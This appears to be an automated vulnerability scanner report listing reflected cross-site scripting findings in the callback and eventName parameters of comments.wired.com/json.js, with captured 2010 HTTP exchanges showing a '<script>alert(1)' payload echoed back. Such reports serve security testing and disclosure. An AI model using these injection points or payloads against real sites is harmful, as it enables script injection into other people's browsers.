1. Cross-site scripting (reflected)
1.1. http://comments.wired.com/json.js [callback parameter]
1.2. http://comments.wired.com/json.js [eventName parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://comments.wired.com |
Path: | /json.js |
GET /json.js?url=%2Fculture Host: comments.wired.com Proxy-Connection: keep-alive Referer: http://www.wired.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __unam=c1361f6-12c70 |
HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 Server: Spezserver/0.1 Vary: Accept-Encoding X-N: S Date: Mon, 22 Nov 2010 01:40:43 GMT Connection: close Content-Length: 3429 commentBroker.handleEventcdaef<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://comments.wired.com |
Path: | /json.js |
GET /json.js?url=%2Fculture Host: comments.wired.com Proxy-Connection: keep-alive Referer: http://www.wired.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __unam=c1361f6-12c70 |
HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 Server: Spezserver/0.1 Vary: Accept-Encoding X-N: S Date: Mon, 22 Nov 2010 01:40:48 GMT Connection: close Content-Length: 3429 commentBroker.handleEvent ...[SNIP]... 2%3A%20%22/culture/art |